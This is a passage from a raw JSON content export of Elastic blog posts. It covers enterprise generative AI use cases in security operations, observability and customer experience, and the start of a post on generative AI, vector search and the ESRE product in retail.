src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbeb7982f65e90086/669a8ba21e4e7e5aeab6a7ab/15-gen-ai.png\" height=\"auto\"/\u003e\u003cp\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI bolsters cybersecurity defenses","_metadata":{"uid":"csa8a303cc63c2141d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eGenerative AI acts as a force multiplier for cybersecurity teams. It makes advanced security measures more accessible to junior analysts through intuitive natural language interfaces, allowing them to learn and apply complex security concepts without needing to be an expert in code or mathematics. And it helps senior analysts combat the ever-growing threat landscape that is being \u003c/span\u003e\u003ca href=\"https://www.fastcompany.com/91125893/generative-ai-for-cybersecurity-is-it-right-for-your-organization\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003efueled by generative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eHere are some ways generative AI is transforming cybersecurity in threat detection, investigation, and response (TDIR):\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eThreat hunting: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eSay an analyst is trying to traverse through hundreds of alerts. What alerts are actual threats that need to be addressed? With generative AI, a security analyst can use the click of a button to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ai-driven-security-analytics\"\u003e\u003cspan style='font-size: 12pt;'\u003etriage hundreds of alerts\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e down to a few attacks.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced detection: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eAI models enhance the detection of anomalous behaviors through pattern recognition, behavioral analysis, and more. Using natural language, an analyst can ask if there are unusual login attempts, irregular file access, or other indicators of malicious activity.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003ePredictive analysis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e AI-driven systems can predict and identify potential vulnerabilities, suggesting proactive defenses before threats have a chance to make it through to your systems.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eAutomated reporting:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e In the event of a security incident, generative AI can automatically compile incident reports, including the nature of the incident, affected systems, potential impact, and recommended remediation steps. This empowers security analysts to take appropriate next steps.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eDeep dive into AI for SecOps\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI improves operational resilience","_metadata":{"uid":"csbe9538683c3ac780"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eGenerative AI can also enhance how businesses monitor and understand their operational data through \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability/aiops\"\u003e\u003cspan style='font-size: 12pt;'\u003eAIOps\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e — using AI to automate and streamline IT operations. Generative AI translates complex data sets into understandable insights through natural language, making it easier for non-experts and experts to make informed decisions, conduct root cause analysis, and limit downtime. Some key applications include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eExplainability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e For those needing domain-specific knowledge quickly, generative AI with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e capabilities can explain functions, logs, or traces in simple terms.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csc0d932609284fd73"}}},{"image":{"image":{"uid":"blt3e42c95c7b008b10","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-06-24T01:50:34.233Z","created_by":"bltb6c155cd84fc0c1a","file_size":"628980","filename":"rag.png","parent_uid":null,"tags":[],"title":"rag.png","updated_at":"2024-06-24T01:50:34.233Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-06-27T13:00:00.915Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3e42c95c7b008b10/6678d0eab00d391b53e040c1/rag.png"},"_metadata":{"uid":"cscc69d66a8bd00ea3"},"caption_l10n":"","alt_text_l10n":"How retrieval augmented generation works","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse67c0430a4cc9df3"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e\u003cstrong\u003ePredictive maintenance:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e In industries like automotive manufacturing, AI-driven predictive maintenance tools can help foresee and address system issues. Before a machine malfunctions, AI can predict and alert workers to address the problem before it affects the manufacturing process.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e\u003cstrong\u003eData synthesis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(13, 13, 13);font-size: 12pt;\"\u003e Data indicating application issues can come from many sources. Site reliability engineers can use AI tools to help synthesize information from various sources into actionable reports, streamlining data and root cause analysis.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/portfolio/operationalizing-generative-ai-strategic-guide\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGet the steps to implement generative AI at your organization\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI enhances customer experiences","_metadata":{"uid":"csdb8288bd93d56a0d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eGenerative AI is revolutionizing customer experiences by personalizing interactions and simplifying customers' information discovery process. Here are some ways generative AI is impacting the user experience:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced search tools:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI search tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e help users quickly find precise information, whether they are customers seeking product recommendations or service reps needing protocol guidelines to help a customer. When users can find what they’re looking for, satisfaction increases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eInteractive digital manuals: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eFor industries like consumer products (say, a video doorbell), AI chatbots can provide real-time, interactive guidance on product features and troubleshooting. This can improve user satisfaction and reduce support calls.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003ePersonalized recommendation systems:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e Generative AI can tailor product recommendations based on individual customer queries, enhancing personalization and satisfaction. In fact, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/explore/improving-digital-customer-experiences/personalizations-critical-role-in-converting-ecommerce-searches-into-sales\"\u003e\u003cspan style='font-size: 12pt;'\u003e88% of online shoppers\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e are more likely to continue shopping on a retailer website that offers a personalized experience, including 96%of Gen Zers and 97% of millennials.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/learn/transform-customer-support-with-ai-powered-search\"\u003e\u003cspan style='font-size: 12pt;'\u003eTransform customer support with AI-powered search\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI use cases in action","_metadata":{"uid":"cs60b0829f733bdff1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eOrganizations across industries are already benefiting from generative AI:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eRetail: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eCustomers can type a project they’re working on like “building a cat tree” into a home improvement site’s search bar and receive a complete list of necessary supplies — getting expert recommendations while streamlining their buying experience.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eTelecom:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e Generative AI can proactively recommend and remediate network issues. Site reliability engineers can ask questions about network health and get answers in real time. This will reduce network downtime and emergency repair costs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eFinancial services:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e Institutions can improve the accuracy and speed of fraud detection while reducing costs through task automation. By learning what behavior patterns to look out for, generative AI tools can help detect fraud while it’s happening in real time and suggest a next best action to the analyst to remediate.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003eTech: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eGenerative AI can accelerate product prototyping and design by augmenting the brainpower of humans to come up with more ideas, faster. This can help when creating new products, expanding services, and solving problems. Sales teams can use generative AI to create emails, summarize prospect interactions, and more. AI-assisted coding can help detect bugs in real time to lessen time to production.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e\u003cstrong\u003ePublic sector: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eGenerative AI can significantly accelerate mission outcomes, improve citizen services, and better connect government analysts and security professionals to the right data at the right time by securely connecting generative AI with agency data.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/cisco\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearn how Cisco creates AI-powered search experiences with Elastic on Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eGenerative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e is not about replacing human capabilities but enhancing and extending them. By improving processes across cybersecurity, observability, and customer experience, generative AI allows organizations in any industry to operate more efficiently, proactively, and responsively. As these technologies continue to evolve, the potential for transformative applications across industries seems boundless.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003eMake these use cases a reality. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/portfolio/operationalizing-generative-ai-strategic-guide\"\u003e\u003cspan style='font-size: 12pt;'\u003eGet the steps to implement generative AI at your organization\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(13, 13, 13);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscbdd94d5d20c231d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2cf89efc63bfc739"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse68124c9f2d33d8f"}}}],"publish_date":"2024-06-27","sanity_migration_complete":false,"seo":{"seo_title_l10n":"15 enterprise generative AI use cases","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt8c57bf8be43a8f34","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-06-24T01:51:34.908Z","created_by":"bltb6c155cd84fc0c1a","file_size":"148715","filename":"Office-building.jpg","parent_uid":null,"tags":[],"title":"Office-building.jpg","updated_at":"2024-06-24T01:51:34.908Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-06-27T13:00:00.928Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8c57bf8be43a8f34/6678d1263641c75d8a13a193/Office-building.jpg"},"title":"15 generative AI use cases for the enterprise","title_l10n":"15 generative AI use cases for the enterprise","updated_at":"2025-02-06T02:45:12.350Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/15-generative-ai-use-cases-enterprise","publish_details":{"time":"2025-02-06T02:45:18.321Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf24a9852d31eb97c","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"Retailers can differentiate themselves by offering next-generation experiences through apps that use Elastic's NLP for product selection. Learn how GAI elevates shopping and how retailers use models within Elasticsearch for enhanced functionality.","author":["blt35b5af4306be8a95"],"category":["bltc17514bfdbc519df"],"created_at":"2023-06-29T19:45:01.797Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf2e6f111f8a6c65c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe retail and consumer packaged goods (CPG) industry has undergone significant transformations due to advancements in technology. Technological innovations have reshaped various aspects of the industry, including customer engagement, inventory optimization, and supply chain management. These innovations have helped drive digital transformation, improve operational efficiency, enhance the customer experience, and promote sustainability. Retailers and CPG companies that embrace and leverage technology effectively are better positioned to thrive in an increasingly competitive and rapidly evolving market. And as we are all well aware, \u003ca href=\"https://www.elastic.co/blog/generative-ai-retail-cpg\" target=\"_self\"\u003egenerative AI\u003c/a\u003e is poised to usher in a new era of enhanced productivity. The retail \u0026amp; CPG industry, being no stranger to reaping such benefits, stands to gain significantly from its adoption.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccording to a recent report from McKinsey,* 63 use cases for generative AI have been identified across 16 business functions. These use cases have the potential to generate economic benefits ranging from US$2.6 trillion to US$4.4 trillion annually when implemented across various industries. Furthermore, per analysis by McKinsey, generative AI could have an impact on most business functions; however, a few stand out when measured by the technology’s impact as a share of functional cost (Exhibit 3). Out of the 16 business functions identified, four functions — customer operations, marketing and sales, software engineering, and research and development — account for approximately 75% of the total annual value from generative AI use cases.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cseceacd9c946b6a09"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"bltf4c6dd6df221b0d9","ACL":{},"content_type":"image/png","created_at":"2023-06-29T19:04:00.177Z","created_by":"bltb6c155cd84fc0c1a","file_size":"132451","filename":"elastic-blog-impact-chart.png","parent_uid":null,"tags":[],"title":"elastic-blog-impact-chart.png","updated_at":"2023-06-29T19:04:00.177Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-30T14:00:00.213Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf4c6dd6df221b0d9/649dd5a01fa6aa6d70adfff1/elastic-blog-impact-chart.png"},"_metadata":{"uid":"cs2e8333e1d63941d7"},"caption_l10n":"","alt_text_l10n":"impact dot chart","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf927ca27f836c798"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy leveraging the power of generative AI, companies can gain a competitive edge, meet changing consumer demands, and stay ahead in an increasingly digital and data-driven marketplace. In the retail \u0026amp; CPG industry, per McKinsey estimates, generative AI could contribute roughly US$310 billion in additional value by boosting performance in functions such as marketing and customer interactions. The bulk of potential value in high tech comes from generative AI’s ability to increase the speed and efficiency of software development (Exhibit 5).\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7f78a6d21ae97240"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt2066df376a82e741","ACL":{},"content_type":"image/png","created_at":"2023-06-29T19:04:43.230Z","created_by":"bltb6c155cd84fc0c1a","file_size":"225278","filename":"elastic-blog-GAI-industries.png","parent_uid":null,"tags":[],"title":"elastic-blog-GAI-industries.png","updated_at":"2023-06-29T19:04:43.230Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-30T14:00:00.304Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2066df376a82e741/649dd5cbb7024265aecac673/elastic-blog-GAI-industries.png"},"_metadata":{"uid":"cs61815cf5bca4e493"},"caption_l10n":"","alt_text_l10n":"GAI industries","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf78d4825f8a9f88d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo successfully adapt to this transformation, it is vital to tap into the knowledge and capabilities of organizations leading the way in this technological advancement, utilizing their expertise to harness the full potential of Gen AI. One such organization is Elastic\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. After I joined Elastic, one of the things that I really enjoy doing is coding and developing tools using Elastic. I am so excited to see how different industries can leverage Elasticsearch\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to unlock value using the immense potential of generative AI.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Shift in customer interaction paradigm","_metadata":{"uid":"cs1f8a9df890752670"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRetailers are presented with a big opportunity to differentiate themselves by creating applications that provide customers with a next-generation experience, thereby gaining a competitive advantage. We have entered into an era wherein users interact with a natural language processing (NLP) interface to aid them in product selection. \u003ca href=\"https://www.elastic.co/blog/generative-ai-retail-cpg\" target=\"_self\"\u003eGenerative AI\u003c/a\u003e can significantly improve the process of product discovery and ordering, elevating the overall shopping experience. There is also a huge opportunity to elevate customer value by delivering personalized experiences that leverage chatbots to emulate human-like conversations about products in ways that can increase customer satisfaction, traffic, and brand loyalty.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNLP enables chatbots to process the user's language, identifies the intent behind their message, and extracts relevant information from it. For example, the goal of NLP is to enable algorithms to process human language and perform tasks that historically only humans were capable of, such as finding relevant passages among large amounts of text, summarizing text, and generating new, original content. These advanced NLP capabilities are built upon a technology known as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003evector search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Elastic has native support for vector search, performing exact and approximate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/knn-search.html#knn-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ek-nearest neighbor (kNN) search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, and for NLP, enabling the use of custom or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-model-ref.html#ml-nlp-model-ref\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethird-party models\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e directly in Elasticsearch.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAnother significant opportunity for the retail industry to deliver a personalized shopping experience through generative AI is the utilization of visual search. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/overview-image-similarity-search-in-elastic\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eImage similarity search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e technology, also known as reverse image search, empowers customers to find products effortlessly by uploading or capturing an image. By leveraging generative AI algorithms, retailers can improve the accuracy and relevance of visual search results. This allows customers to easily find similar products, accessories, or even visually complementary items, facilitating a more seamless and personalized shopping experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eImagine a customer visiting your site, and they are able to mimic a celebrity’s look with just a screenshot. This experience helps create a highly intuitive search experience for customers, where they can effortlessly find what they are looking for with just an image.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVector search leverages \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/elasticsearch-machine-learning\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emachine learning\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e (ML) to capture the meaning and context of unstructured data. Vector search finds similar data using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/introducing-approximate-nearest-neighbor-search-in-elasticsearch-8-0\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eapproximate nearing neighbor (ANN)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e algorithms. Compared to traditional text search (in Elastic, based on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/practical-bm25-part-2-the-bm25-algorithm-and-its-variables\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBM25 scoring\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e), vector search yields more relevant results and executes faster (without the need for extreme search engine optimizations). This approach works not only with text data but also images and other types of unstructured data for which generic embedding models are available. In the case of text data, it is commonly referred to as semantic search, while similarity search is often used in the context of images and audio.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbf1fb3ea2935ba15"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"bltdb8c8db9977e23b3","ACL":{},"content_type":"image/png","created_at":"2023-06-30T01:39:25.557Z","created_by":"bltb6c155cd84fc0c1a","file_size":"290703","filename":"elastic-blog-democratizing-ai-v2.png","parent_uid":null,"tags":[],"title":"elastic-blog-democratizing-ai-v2.png","updated_at":"2023-06-30T01:39:25.557Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-30T14:00:00.437Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdb8c8db9977e23b3/649e324d63cca65a2ed29bd2/elastic-blog-democratizing-ai-v2.png"},"_metadata":{"uid":"cs6e8998dbbf23e4d3"},"caption_l10n":"","alt_text_l10n":"democratizing ai","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-x-large: 100%"}}},{"title_text":{"title_text":[{"title_l10n":"Mitigating the business risks of generative AI","_metadata":{"uid":"csb0fb6773cf6a0c17"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhile the enthusiasm surrounding this technology is tangible, it also carries inherent risks. Business leaders face the challenge of identifying the necessary skills and capabilities for their workforce and rethinking core business processes like retraining and skill development. Additionally, they must address a variety of potential security vulnerabilities and privacy risks.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic’s launch of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/may-2023-launch-announcement\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Relevance Engine™ (ESRE™)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e helps solve many of the challenges mentioned above. ESRE offers new capabilities for creating highly relevant AI search applications and combines the best of AI with Elastic’s text search to make \u003ca href=\"https://www.elastic.co/enterprise-search/generative-ai\" target=\"_self\"\u003egenerative AI search engines\u003c/a\u003e. ESRE gives developers a full suite of sophisticated retrieval algorithms and the ability to integrate with large language models (LLMs). Even better, it’s accessible via a simple, unified API that Elastic’s community already trusts, so developers around the world can start using it immediately to elevate search relevance. ESRE also lets developers manage and use their own transformer models in Elastic for business specific context and also bring in third-party transformer models such as OpenAI’s GPT-3 and GPT-4 via API to retrieve intuitive summarization of content based on the customer’s data stores consolidated within Elasticsearch deployments.\u0026nbsp;\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEnsuring data privacy is a key consideration for enterprises when securely transmitting proprietary data across networks and components, particularly in the context of developing innovative search experiences. 